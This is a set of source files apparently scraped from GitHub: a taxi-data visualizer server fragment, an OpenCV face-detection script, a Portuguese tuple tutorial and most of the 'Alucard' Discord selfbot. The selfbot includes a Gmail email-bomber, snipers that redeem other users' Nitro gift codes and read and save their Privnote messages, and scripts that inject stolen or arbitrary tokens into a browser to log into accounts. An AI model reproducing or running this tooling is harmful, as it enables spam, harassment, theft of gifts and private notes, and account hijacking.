self.end_headers()
return f
except:
f.close()
raise
def send_datalist(self):
l = []
for path, subs, files in os.walk(visualizer_path):
for file in files:
mtime = os.stat('%s/%s' % (path, file))[8]
l.append('{"path":["%s"],"name":"%s","mtime":%d}' % ('","'.join(path[len(visualizer_path):].split('/')), file, mtime))
l.sort()
f = StringIO()
f.write("[")
f.write(','.join(l))
f.write("]")
length = f.tell()
f.seek(0)
self.send_response(200)
encoding = sys.getfilesystemencoding()
self.send_header("Content-type", "text/html; charset=%s" % encoding)
self.send_header("Content-Length", str(length))
self.end_headers()
return f
def send_extract(self, query):
f = StringIO()
query = urllib.unquote(query)
content = Vlist()
for (i,sub) in enumerate(query.split(',')):
r = sub.split('-')
if len(r)==1:
if sub.strip()[0].lower()=='t':
sub=sub.strip()[1:]
content.append(Path(test_data.extract(int(sub)), 'T%s<br>'%sub))
else:
content.append(Path(train_data.extract(int(sub)), '%s<br>'%sub))
elif len(r)==2:
test = False
if r[0].strip()[0].lower()=='t':
test = True
r[0]=r[0].strip()[1:]
if r[1].strip()[0].lower()=='t':
r[1]=r[1].strip()[1:]
for i in xrange(int(r[0]), int(r[1])+1):
if test:
content.append(Path(test_data.extract(i), 'T%d<br>'%i))
else:
content.append(Path(train_data.extract(i), '%d<br>'%i))
elif len(r)>2:
self.send_error(404, 'File not found')
return None
content.write(f)
length = f.tell()
f.seek(0)
self.send_response(200)
encoding = sys.getfilesystemencoding()
self.send_header("Content-type", "text/html; charset=%s" % encoding)
self.send_header("Content-Length", str(length))
self.end_headers()
return f
if __name__ == '__main__':
if len(sys.argv) < 2:
print >>sys.stderr, 'Usage: %s port [--no-hdf5]' % sys.argv[0]
if '--no-hdf5' not in sys.argv:
print >>sys.stderr, 'Loading dataset',
path = os.path.join(data.path, 'data.hdf5')
train_data = TaxiDataset('train')
test_data = TaxiDataset('test')
print >>sys.stderr, 'done'
httpd = SocketServer.TCPServer(('', int(sys.argv[1])), VisualizerHTTPRequestHandler)
httpd.serve_forever()
| 35.224 | 134 | 0.532137 |
c410f49d28ff597da06c1d25f9b1aa77ed622089 | 1,103 | py | Python | facedetection_vj.py | sgino209/FaceDetection_VJ_liveCam | ab68ecb26bf11704658e2fa6634e3daad516c155 | [
"Apache-2.0"
] | 1 | 2017-09-18T04:32:28.000Z | 2017-09-18T04:32:28.000Z | facedetection_vj.py | sgino209/FaceDetection_VJ_liveCam | ab68ecb26bf11704658e2fa6634e3daad516c155 | [
"Apache-2.0"
] | null | null | null | facedetection_vj.py | sgino209/FaceDetection_VJ_liveCam | ab68ecb26bf11704658e2fa6634e3daad516c155 | [
"Apache-2.0"
] | null | null | null | import cv2
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
cap = cv2.VideoCapture(0)
if not cap.isOpened():
print("Error")
exit(1)
fps = cap.get(cv2.CAP_PROP_FPS)
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
framesNum = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
while True:
ret, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
img = cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = img[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for (ex, ey, ew, eh) in eyes:
cv2.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0, 255, 0), 2)
img_scl = cv2.resize(img, None, fx=0.3, fy=0.3, interpolation=cv2.INTER_CUBIC)
cv2.imshow('img', img_scl)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
| 29.026316 | 82 | 0.644606 |
a52b7b97f81a1dca19bc123677e1c25965c83222 | 3,646 | py | Python | s07_colecoes/s07a02_tuplas.py | adeogliari/GeekUniversity_Python | 1b6badc45ca1dfbaa2f42196fb2dedac417b866e | [
"MIT"
] | null | null | null | s07_colecoes/s07a02_tuplas.py | adeogliari/GeekUniversity_Python | 1b6badc45ca1dfbaa2f42196fb2dedac417b866e | [
"MIT"
] | null | null | null | s07_colecoes/s07a02_tuplas.py | adeogliari/GeekUniversity_Python | 1b6badc45ca1dfbaa2f42196fb2dedac417b866e | [
"MIT"
] | null | null | null | """
Tuplas (tuple)
Tuplas são bastante parecidas com listas.
Existem basicamente duas diferenças:
1 - As tuplas são representadas por parênteses ()
2 - As tuplas são imutáveis: Isso significa que ao se criar uma tupla ela não
muda. Toda operação em uma tupla gera uma nova tupla
# CUIDADO 1: As tuplas são representadas por (), mas veja:
tupla1 = (1, 2, 3, 4, 5, 6)
print(tupla1)
print(type(tupla1))
tupla2 = 1, 2, 3, 4, 5, 6
print(tupla2)
print(type(tupla2))
# CUIDADO 2: Tuplas com 1 elemento
tupla3 = (4) # Isso não é uma tupla!
print(tupla3)
print(type(tupla3))
tupla4 = (4,) # Isso é uma tupla!
print(tupla4)
print(type(tupla4))
# CONCLUSÃO: As tuplas são definidas pela vírgula e não pelo uso do parênteses
tupla5 = 5, # Isso é uma tupla!
print(tupla5)
print(type(tupla5))
(4) -> Não é tupla
(4,) -> É tupla
4, -> É tupla
# Podemos gerar uma tupla dinamicamente com range (início,fim,passo)
tupla = tuple(range(11))
print(tupla)
print(type(tupla))
# Desenpacotamento de tupla
tupla = ('Geek University', 'programação em Python: Essencial')
escola, curso = tupla
print(escola)
print(curso)
# Métodos para adição e remoção de elementos nas tuplas não existem, dado o fato das
tuplas serem imutáveis
# Soma*, Valor Máximo*, Valor Mínimo* e Tamanho
* Se os valores forem todos inteiros ou reais
tupla = (1, 2, 3, 4, 5, 6)
print(sum(tupla))
print(max(tupla))
print(min(tupla))
print(len(tupla))
# Concatenação de tuplas
tupla1 = (1, 2, 3)
print(tupla1)
tupla2 = (4, 5, 6)
print(tupla2)
print(tupla1 + tupla2) # todas são imutáveis
print(tupla1)
print(tupla2)
tupla3 = tupla1 + tupla2
print(tupla3)
tupla1 = tupla1 + tupla2 # Tuplas são imutáveis, mas podemos sobrescrever seus valores
print(tupla1)
# Verificar se determinado elemento está contido na tupla
tupla = (1, 2, 3)
print(3 in tupla)
# Iterando sobre uma tupla
tupla = (1, 2, 3)
for n in tupla:
print(n)
for indice, valor in enumerate(tupla):
print(indice, valor)
# Contando elementos dentro de uma tupla
tupla = ('a', 'b', 'c', 'd', 'e', 'a', 'b')
print(tupla.count('c'))
escola = tuple('Geek University')
print(escola)
print(escola.count('e'))
# Dicas na utilização de tuplas
- Devemos utilizar tuplas SEMPRE que não precisarmos modificar os dados contidos
em uma coleção
# Exemplo 1
meses = ('Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho',
'Agosto', 'Setembro', 'Outubro', 'Novembro', 'Dezembro')
# O acesso de elementos de uma tupla também é semelhante a de uma lista
print(meses[5])
# Iterar com while
i = 0
while i < len(meses):
print(meses[i])
i += 1
# Verificamos em qual índice um elemento está na tupla
print(meses.index('Dezembro'))
# Slicing: tupla[inicio:fim:passo]
meses = ('Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho',
'Agosto', 'Setembro', 'Outubro', 'Novembro', 'Dezembro')
print(meses[0::2])
# Por quê utilizar tuplas?
- Tuplas são mais rápidas do que listas.
- Tuplas deixam o código mais seguro*.
* Isso porque trabalhar com elementos imutáveis traz segurança para o código.
# Copiando uma tupla para outra
tupla = (1, 2, 3)
print(tupla)
nova = tupla # Na tupla não temos o problema de Shallow Copy
print(nova)
print(tupla)
outra = (4, 5, 6)
nova = nova + outra
print(nova)
print(tupla)
"""
| 22.09697 | 90 | 0.630005 |
4cd2bfa749d2f3073ed9f0d6b5cc354c984b044a | 69,994 | py | Python | Alucard-Selfbot-src-master/Main.py | navisx/saiph | dabd68c633ee8d0758882f0c80c91734040c8bb4 | [
"MIT"
] | null | null | null | Alucard-Selfbot-src-master/Main.py | navisx/saiph | dabd68c633ee8d0758882f0c80c91734040c8bb4 | [
"MIT"
] | null | null | null | Alucard-Selfbot-src-master/Main.py | navisx/saiph | dabd68c633ee8d0758882f0c80c91734040c8bb4 | [
"MIT"
] | null | null | null | class SELFBOT():
__linecount__ = 1933
__version__ = 3.4
# Dont just skid it, gimme some credits, thank you - coats.#1234
import discord, subprocess, sys, time, os, colorama, base64, codecs, datetime, io, random, numpy, datetime, smtplib, string, ctypes
import urllib.parse, urllib.request, re, json, requests, webbrowser, aiohttp, dns.name, asyncio, functools, logging
from discord.ext import (
commands,
tasks
)
from bs4 import BeautifulSoup as bs4
from urllib.parse import urlencode
from pymongo import MongoClient
from selenium import webdriver
from threading import Thread
from subprocess import call
from itertools import cycle
from colorama import Fore
from sys import platform
from PIL import Image
import pyPrivnote as pn
from gtts import gTTS
ctypes.windll.kernel32.SetConsoleTitleW(f'[Alucard Selfbot v{SELFBOT.__version__}] | Loading...')
with open('config.json') as f:
config = json.load(f)
token = config.get('token')
password = config.get('password')
prefix = config.get('prefix')
giveaway_sniper = config.get('giveaway_sniper')
slotbot_sniper = config.get('slotbot_sniper')
nitro_sniper = config.get('nitro_sniper')
privnote_sniper = config.get('privnote_sniper')
stream_url = config.get('stream_url')
tts_language = config.get('tts_language')
bitly_key = config.get('bitly_key')
cat_key = config.get('cat_key')
weather_key = config.get('weather_key')
cuttly_key = config.get('cuttly_key')
width = os.get_terminal_size().columns
hwid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
start_time = datetime.datetime.utcnow()
loop = asyncio.get_event_loop()
languages = {
'hu' : 'Hungarian, Hungary',
'nl' : 'Dutch, Netherlands',
'no' : 'Norwegian, Norway',
'pl' : 'Polish, Poland',
'pt-BR' : 'Portuguese, Brazilian, Brazil',
'ro' : 'Romanian, Romania',
'fi' : 'Finnish, Finland',
'sv-SE' : 'Swedish, Sweden',
'vi' : 'Vietnamese, Vietnam',
'tr' : 'Turkish, Turkey',
'cs' : 'Czech, Czechia, Czech Republic',
'el' : 'Greek, Greece',
'bg' : 'Bulgarian, Bulgaria',
'ru' : 'Russian, Russia',
'uk' : 'Ukranian, Ukraine',
'th' : 'Thai, Thailand',
'zh-CN' : 'Chinese, China',
'ja' : 'Japanese',
'zh-TW' : 'Chinese, Taiwan',
'ko' : 'Korean, Korea'
}
locales = [
"da", "de",
"en-GB", "en-US",
"es-ES", "fr",
"hr", "it",
"lt", "hu",
"nl", "no",
"pl", "pt-BR",
"ro", "fi",
"sv-SE", "vi",
"tr", "cs",
"el", "bg",
"ru", "uk",
"th", "zh-CN",
"ja", "zh-TW",
"ko"
]
m_numbers = [
":one:",
":two:",
":three:",
":four:",
":five:",
":six:"
]
m_offets = [
(-1, -1),
(0, -1),
(1, -1),
(-1, 0),
(1, 0),
(-1, 1),
(0, 1),
(1, 1)
]
def startprint():
if giveaway_sniper == True:
giveaway = "Active"
else:
giveaway = "Disabled"
if nitro_sniper == True:
nitro = "Active"
else:
nitro = "Disabled"
if slotbot_sniper == True:
slotbot = "Active"
else:
slotbot = "Disabled"
if privnote_sniper == True:
privnote = "Active"
else:
privnote = "Disabled"
print(f'''{Fore.RESET}
▄▄▄ ██▓ █ ██ ▄████▄ ▄▄▄ ██▀███ ▓█████▄
▒████▄ ▓██▒ ██ ▓██▒▒██▀ ▀█ ▒████▄ ▓██ ▒ ██▒▒██▀ ██▌
▒██ ▀█▄ ▒██░ ▓██ ▒██░▒▓█ ▄ ▒██ ▀█▄ ▓██ ░▄█ ▒░██ █▌
░██▄▄▄▄██ ▒██░ ▓▓█ ░██░▒▓▓▄ ▄██▒░██▄▄▄▄██ ▒██▀▀█▄ ░▓█▄ ▌
▓█ ▓██▒░██████▒▒▒█████▓ ▒ ▓███▀ ░ ▓█ ▓██▒░██▓ ▒██▒░▒████▓
▒▒ ▓▒█░░ ▒░▓ ░░▒▓▒ ▒ ▒ ░ ░▒ ▒ ░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒▒▓ ▒
▒ ▒▒ ░░ ░ ▒ ░░░▒░ ░ ░ ░ ▒ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒ ▒
░ ▒ ░ ░ ░░░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
{Fore.CYAN}Alucard {SELFBOT.__version__} | {Fore.GREEN}Logged in as: {Alucard.user.name}#{Alucard.user.discriminator} {Fore.CYAN}| ID: {Fore.GREEN}{Alucard.user.id}
{Fore.CYAN}Privnote Sniper | {Fore.GREEN}{privnote}
{Fore.CYAN}Nitro Sniper | {Fore.GREEN}{nitro}
{Fore.CYAN}Giveaway Sniper | {Fore.GREEN}{giveaway}
{Fore.CYAN}SlotBot Sniper | {Fore.GREEN}{slotbot}
{Fore.CYAN}Prefix: {Fore.GREEN}{prefix}
{Fore.CYAN}Creator(open-source on github): {Fore.GREEN}coats.#1234
'''+Fore.RESET)
def Clear():
os.system('cls')
Clear()
def Init():
if config.get('token') == "token-here":
Clear()
print(f"{Fore.RED}[ERROR] {Fore.YELLOW}You didnt put your token in the config.json file"+Fore.RESET)
else:
token = config.get('token')
try:
Alucard.run(token, bot=False, reconnect=True)
os.system(f'title (Alucard Selfbot) - Version {SELFBOT.__version__}')
except discord.errors.LoginFailure:
print(f"{Fore.RED}[ERROR] {Fore.YELLOW}Improper token has been passed"+Fore.RESET)
os.system('pause >NUL')
def GmailBomber():
_smpt = smtplib.SMTP('smtp.gmail.com', 587)
_smpt.starttls()
username = input('Gmail: ')
password = input('Gmail Password: ')
try:
_smpt.login(username, password)
except:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW} Incorrect Password or gmail, make sure you've enabled less-secure apps access"+Fore.RESET)
target = input('Target Gmail: ')
message = input('Message to send: ')
counter = eval(input('Ammount of times: '))
count = 0
while count < counter:
count = 0
_smpt.sendmail(username, target, message)
count += 1
if count == counter:
pass
def GenAddress(addy: str):
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
four_char = ''.join(random.choice(letters) for _ in range(4))
should_abbreviate = random.randint(0,1)
if should_abbreviate == 0:
if "street" in addy.lower():
addy = addy.replace("Street", "St.")
addy = addy.replace("street", "St.")
elif "st." in addy.lower():
addy = addy.replace("st.", "Street")
addy = addy.replace("St.", "Street")
if "court" in addy.lower():
addy = addy.replace("court", "Ct.")
addy = addy.replace("Court", "Ct.")
elif "ct." in addy.lower():
addy = addy.replace("ct.", "Court")
addy = addy.replace("Ct.", "Court")
if "rd." in addy.lower():
addy = addy.replace("rd.", "Road")
addy = addy.replace("Rd.", "Road")
elif "road" in addy.lower():
addy = addy.replace("road", "Rd.")
addy = addy.replace("Road", "Rd.")
if "dr." in addy.lower():
addy = addy.replace("dr.", "Drive")
addy = addy.replace("Dr.", "Drive")
elif "drive" in addy.lower():
addy = addy.replace("drive", "Dr.")
addy = addy.replace("Drive", "Dr.")
if "ln." in addy.lower():
addy = addy.replace("ln.", "Lane")
addy = addy.replace("Ln.", "Lane")
elif "lane" in addy.lower():
addy = addy.replace("lane", "Ln.")
addy = addy.replace("lane", "Ln.")
random_number = random.randint(1,99)
extra_list = ["Apartment", "Unit", "Room"]
random_extra = random.choice(extra_list)
return four_char + " " + addy + " " + random_extra + " " + str(random_number)
def BotTokens():
with open('Data/Tokens/bot-tokens.txt', 'a+') as f:
tokens = {token.strip() for token in f if token}
for token in tokens:
yield token
def UserTokens():
with open('Data/Tokens/user-tokens.txt', 'a+') as f:
tokens = {token.strip() for token in f if token}
for token in tokens:
yield token
class Login(discord.Client):
async def on_connect(self):
guilds = len(self.guilds)
users = len(self.users)
print("")
print(f"Connected to: [{self.user.name}]")
print(f"Token: {self.http.token}")
print(f"Guilds: {guilds}")
print(f"Users: {users}")
print("-------------------------------")
await self.logout()
def _masslogin(choice):
if choice == 'user':
for token in UserTokens():
loop.run_until_complete(Login().start(token, bot=False))
elif choice == 'bot':
for token in BotTokens():
loop.run_until_complete(Login().start(token, bot=True))
else:
return
def async_executor():
def outer(func):
@functools.wraps(func)
def inner(*args, **kwargs):
thing = functools.partial(func, *args, **kwargs)
return loop.run_in_executor(None, thing)
return inner
return outer
@async_executor()
def do_tts(message):
f = io.BytesIO()
tts = gTTS(text=message.lower(), lang=tts_language)
tts.write_to_fp(f)
f.seek(0)
return f
def Dump(ctx):
for member in ctx.guild.members:
f = open(f'Images/{ctx.guild.id}-Dump.txt', 'a+')
f.write(str(member.avatar_url)+'\n')
def Nitro():
code = ''.join(random.choices(string.ascii_letters + string.digits, k=16))
return f'https://discord.gift/{code}'
def RandomColor():
randcolor = discord.Color(random.randint(0x000000, 0xFFFFFF))
return randcolor
def RandString():
return "".join(random.choice(string.ascii_letters + string.digits) for i in range(random.randint(14, 32)))
colorama.init()
Alucard = discord.Client()
Alucard = commands.Bot(
description='Alucard Selfbot',
command_prefix=prefix,
self_bot=True
)
Alucard.remove_command('help')
@tasks.loop(seconds=3)
async def btc_status():
r = requests.get('https://api.coindesk.com/v1/bpi/currentprice/btc.json').json()
value = r['bpi']['USD']['rate']
await asyncio.sleep(3)
btc_stream = discord.Streaming(
name="Current BTC price: "+value+"$ USD",
url="https://www.twitch.tv/monstercat",
)
await Alucard.change_presence(activity=btc_stream)
@Alucard.event
async def on_command_error(ctx, error):
error_str = str(error)
error = getattr(error, 'original', error)
if isinstance(error, commands.CommandNotFound):
return
elif isinstance(error, commands.CheckFailure):
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}You're missing permission to execute this command"+Fore.RESET)
elif isinstance(error, commands.MissingRequiredArgument):
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Missing arguments: {error}"+Fore.RESET)
elif isinstance(error, numpy.AxisError):
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Not a valid image"+Fore.RESET)
elif isinstance(error, discord.errors.Forbidden):
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Discord error: {error}"+Fore.RESET)
elif "Cannot send an empty message" in error_str:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Couldnt send a empty message"+Fore.RESET)
else:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{error_str}"+Fore.RESET)
@Alucard.event
async def on_message_edit(before, after):
await Alucard.process_commands(after)
@Alucard.event
async def on_message(message):
def GiveawayData():
print(
f"{Fore.WHITE} - CHANNEL: {Fore.YELLOW}[{message.channel}]"
f"\n{Fore.WHITE} - SERVER: {Fore.YELLOW}[{message.guild}]"
+Fore.RESET)
def SlotBotData():
print(
f"{Fore.WHITE} - CHANNEL: {Fore.YELLOW}[{message.channel}]"
f"\n{Fore.WHITE} - SERVER: {Fore.YELLOW}[{message.guild}]"
+Fore.RESET)
def NitroData(elapsed, code):
print(
f"{Fore.WHITE} - CHANNEL: {Fore.YELLOW}[{message.channel}]"
f"\n{Fore.WHITE} - SERVER: {Fore.YELLOW}[{message.guild}]"
f"\n{Fore.WHITE} - AUTHOR: {Fore.YELLOW}[{message.author}]"
f"\n{Fore.WHITE} - ELAPSED: {Fore.YELLOW}[{elapsed}]"
f"\n{Fore.WHITE} - CODE: {Fore.YELLOW}{code}"
+Fore.RESET)
def PrivnoteData(code):
print(
f"{Fore.WHITE} - CHANNEL: {Fore.YELLOW}[{message.channel}]"
f"\n{Fore.WHITE} - SERVER: {Fore.YELLOW}[{message.guild}]"
f"\n{Fore.WHITE} - CONTENT: {Fore.YELLOW}[The content can be found at Privnote/{code}.txt]"
+Fore.RESET)
time = datetime.datetime.now().strftime("%H:%M %p")
if 'discord.gift/' in message.content:
if nitro_sniper == True:
start = datetime.datetime.now()
code = re.search("discord.gift/(.*)", message.content).group(1)
token = config.get('token')
headers = {'Authorization': token}
r = requests.post(
f'https://discordapp.com/api/v6/entitlements/gift-codes/{code}/redeem',
headers=headers,
).text
elapsed = datetime.datetime.now() - start
elapsed = f'{elapsed.seconds}.{elapsed.microseconds}'
if 'This gift has been redeemed already.' in r:
print(""
f"\n{Fore.CYAN}[{time} - Nitro Already Redeemed]"+Fore.RESET)
NitroData(elapsed, code)
elif 'subscription_plan' in r:
print(""
f"\n{Fore.CYAN}[{time} - Nitro Success]"+Fore.RESET)
NitroData(elapsed, code)
elif 'Unknown Gift Code' in r:
print(""
f"\n{Fore.CYAN}[{time} - Nitro Unknown Gift Code]"+Fore.RESET)
NitroData(elapsed, code)
else:
return
if 'Someone just dropped' in message.content:
if slotbot_sniper == True:
if message.author.id == 346353957029019648:
try:
await message.channel.send('~grab')
except discord.errors.Forbidden:
print(""
f"\n{Fore.CYAN}[{time} - SlotBot Couldnt Grab]"+Fore.RESET)
SlotBotData()
print(""
f"\n{Fore.CYAN}[{time} - Slotbot Grabbed]"+Fore.RESET)
SlotBotData()
else:
return
if 'GIVEAWAY' in message.content:
if giveaway_sniper == True:
if message.author.id == 294882584201003009:
try:
await message.add_reaction("🎉")
except discord.errors.Forbidden:
print(""
f"\n{Fore.CYAN}[{time} - Giveaway Couldnt React]"+Fore.RESET)
GiveawayData()
print(""
f"\n{Fore.CYAN}[{time} - Giveaway Sniped]"+Fore.RESET)
GiveawayData()
else:
return
if f'Congratulations <@{Alucard.user.id}>' in message.content:
if giveaway_sniper == True:
if message.author.id == 294882584201003009:
print(""
f"\n{Fore.CYAN}[{time} - Giveaway Won]"+Fore.RESET)
GiveawayData()
else:
return
if 'privnote.com' in message.content:
if privnote_sniper == True:
code = re.search('privnote.com/(.*)', message.content).group(1)
link = 'https://privnote.com/'+code
try:
note_text = pn.read_note(link)
except Exception as e:
print(e)
with open(f'Privnote/{code}.txt', 'a+') as f:
print(""
f"\n{Fore.CYAN}[{time} - Privnote Sniped]"+Fore.RESET)
PrivnoteData(code)
f.write(note_text)
else:
return
await Alucard.process_commands(message)
@Alucard.event
async def on_connect():
Clear()
if giveaway_sniper == True:
giveaway = "Active"
else:
giveaway = "Disabled"
if nitro_sniper == True:
nitro = "Active"
else:
nitro = "Disabled"
if slotbot_sniper == True:
slotbot = "Active"
else:
slotbot = "Disabled"
if privnote_sniper == True:
privnote = "Active"
else:
privnote = "Disabled"
startprint()
ctypes.windll.kernel32.SetConsoleTitleW(f'[Alucard Selfbot v{SELFBOT.__version__}] | Logged in as {Alucard.user.name}')
@Alucard.command()
async def clear(ctx): # b'\xfc'
await ctx.message.delete()
await ctx.send('ᅠᅠ'+'\n' * 400 + 'ᅠᅠ')
@Alucard.command()
async def genname(ctx): # b'\xfc'
await ctx.message.delete()
first, second = random.choices(ctx.guild.members, k=2)
first = first.display_name[len(first.display_name) // 2:]
second = second.display_name[:len(second.display_name) // 2]
await ctx.send(discord.utils.escape_mentions(second + first))
@Alucard.command()
async def lmgtfy(ctx, *, message): # b'\xfc'
await ctx.message.delete()
q = urlencode({"q": message})
await ctx.send(f'<https://lmgtfy.com/?{q}>')
@Alucard.command()
async def login(ctx, _token): # b'\xfc'
await ctx.message.delete()
opts = webdriver.ChromeOptions()
opts.add_experimental_option("detach", True)
driver = webdriver.Chrome('chromedriver.exe', options=opts)
script = """
function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
"""
driver.get("https://discordapp.com/login")
driver.execute_script(script+f'\nlogin("{_token}")')
@Alucard.command()
async def botlogin(ctx, _token): # b'\xfc'
await ctx.message.delete()
opts = webdriver.ChromeOptions()
opts.add_experimental_option("detach", True)
driver = webdriver.Chrome('chromedriver.exe', options=opts)
script = """
function login(token) {
((i) => {
window.webpackJsonp.push([
[i], {
[i]: (n, b, d) => {
let dispatcher;
for (let key in d.c) {
if (d.c[key].exports) {
const module = d.c[key].exports.default || d.c[key].exports;
if (typeof(module) === 'object') {
if ('setToken' in module) {
module.setToken(token);
module.hideToken = () => {};
}
if ('dispatch' in module && '_subscriptions' in module) {
dispatcher = module;
}
if ('AnalyticsActionHandlers' in module) {
console.log('AnalyticsActionHandlers', module);
module.AnalyticsActionHandlers.handleTrack = (track) => {};
}
} else if (typeof(module) === 'function' && 'prototype' in module) {
const descriptors = Object.getOwnPropertyDescriptors(module.prototype);
if ('_discoveryFailed' in descriptors) {
const connect = module.prototype._connect;
module.prototype._connect = function(url) {
console.log('connect', url);
const oldHandleIdentify = this.handleIdentify;
this.handleIdentify = () => {
const identifyData = oldHandleIdentify();
identifyData.token = identifyData.token.split(' ').pop();
return identifyData;
};
const oldHandleDispatch = this._handleDispatch;
this._handleDispatch = function(data, type) {
if (type === 'READY') {
console.log(data);
data.user.bot = false;
data.user.email = 'Alucard-Was-Here@Fuckyou.com';
data.analytics_tokens = [];
data.connected_accounts = [];
data.consents = [];
data.experiments = [];
data.guild_experiments = [];
data.relationships = [];
data.user_guild_settings = [];
}
return oldHandleDispatch.call(this, data, type);
}
return connect.call(this, url);
};
}
}
}
}
console.log(dispatcher);
if (dispatcher) {
dispatcher.dispatch({
type: 'LOGIN_SUCCESS',
token
});
}
},
},
[
[i],
],
]);
})(Math.random());
}
"""
driver.get("https://discordapp.com/login")
driver.execute_script(script+f'\nlogin("Bot {_token}")')
@Alucard.command()
async def address(ctx, *, text): # b'\xfc'
await ctx.message.delete()
addy = ' '.join(text)
address_array = []
i = 0
while i < 10:
address_array.append(GenAddress(addy))
i+=1
final_str = "\n".join(address_array)
em = discord.Embed(description=final_str)
try:
await ctx.send(embed=em)
except:
await ctx.send(final_str)
@Alucard.command()
async def weather(ctx, *, city): # b'\xfc'
await ctx.message.delete()
if weather_key == '':
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Weather API key has not been set in the config.json file"+Fore.RESET)
else:
try:
req = requests.get(f'http://api.openweathermap.org/data/2.5/weather?q={city}&appid={weather_key}')
r = req.json()
temperature = round(float(r["main"]["temp"]) - 273.15, 1)
lowest = round(float(r["main"]["temp_min"]) - 273.15, 1)
highest = round(float(r["main"]["temp_max"]) - 273.15, 1)
weather = r["weather"][0]["main"]
humidity = round(float(r["main"]["humidity"]), 1)
wind_speed = round(float(r["wind"]["speed"]), 1)
em = discord.Embed(description=f'''
Temperature: `{temperature}`
Lowest: `{lowest}`
Highest: `{highest}`
Weather: `{weather}`
Humidity: `{humidity}`
Wind Speed: `{wind_speed}`
''')
em.add_field(name='City', value=city.capitalize())
em.set_thumbnail(url='https://ak0.picdn.net/shutterstock/videos/1019313310/thumb/1.jpg')
try:
await ctx.send(embed=em)
except:
await ctx.send(f'''
Temperature: {temperature}
Lowest: {lowest}
Highest: {highest}
Weather: {weather}
Humidity: {humidity}
Wind Speed: {wind_speed}
City: {city.capitalize()}
''')
except KeyError:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{city} Is not a real city"+Fore.RESET)
else:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{req.text}"+Fore.RESET)
@Alucard.command(aliases=['shorteen'])
async def bitly(ctx, *, link): # b'\xfc'
await ctx.message.delete()
if bitly_key == '':
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Bitly API key has not been set in the config.json file"+Fore.RESET)
else:
try:
async with aiohttp.ClientSession() as session:
async with session.get(f'https://api-ssl.bitly.com/v3/shorten?longUrl={link}&domain=bit.ly&format=json&access_token={bitly_key}') as req:
r = await req.read()
r = json.loads(r)
new = r['data']['url']
em = discord.Embed()
em.add_field(name='Shortened link', value=new, inline=False)
await ctx.send(embed=em)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
else:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{req.text}"+Fore.RESET)
@Alucard.command()
async def cuttly(ctx, *, link): # b'\xfc'
await ctx.message.delete()
if cuttly_key == '':
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Cutt.ly API key has not been set in the config.json file"+Fore.RESET)
else:
try:
req = requests.get(f'https://cutt.ly/api/api.php?key={cuttly_key}&short={link}')
r = req.json()
new = r['url']['shortLink']
em = discord.Embed()
em.add_field(name='Shortened link', value=new, inline=False)
try:
await ctx.send(embed=em)
except:
await ctx.send(new)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
else:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{req.text}"+Fore.RESET)
@Alucard.command()
async def cat(ctx): # b'\xfc'
await ctx.message.delete()
if cat_key == '':
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Cat API key has not been set in the config.json file"+Fore.RESET)
else:
try:
req = requests.get(f"https://api.thecatapi.com/v1/images/search?format=json&x-api-key={cat_key}")
r = req.json()
em = discord.Embed()
em.set_image(url=str(r[0]["url"]))
try:
await ctx.send(embed=em)
except:
await ctx.send(str(r[0]["url"]))
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
else:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{req.text}"+Fore.RESET)
@Alucard.command()
async def dog(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://dog.ceo/api/breeds/image/random").json()
em = discord.Embed()
em.set_image(url=str(r['message']))
try:
await ctx.send(embed=em)
except:
await ctx.send(str(r['message']))
@Alucard.command()
async def fox(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get('https://randomfox.ca/floof/').json()
em = discord.Embed(title="Random fox image", color=16202876)
em.set_image(url=r["image"])
try:
await ctx.send(embed=em)
except:
await ctx.send(r['image'])
@Alucard.command()
async def encode(ctx, string): # b'\xfc'
await ctx.message.delete()
decoded_stuff = base64.b64encode('{}'.format(string).encode('ascii'))
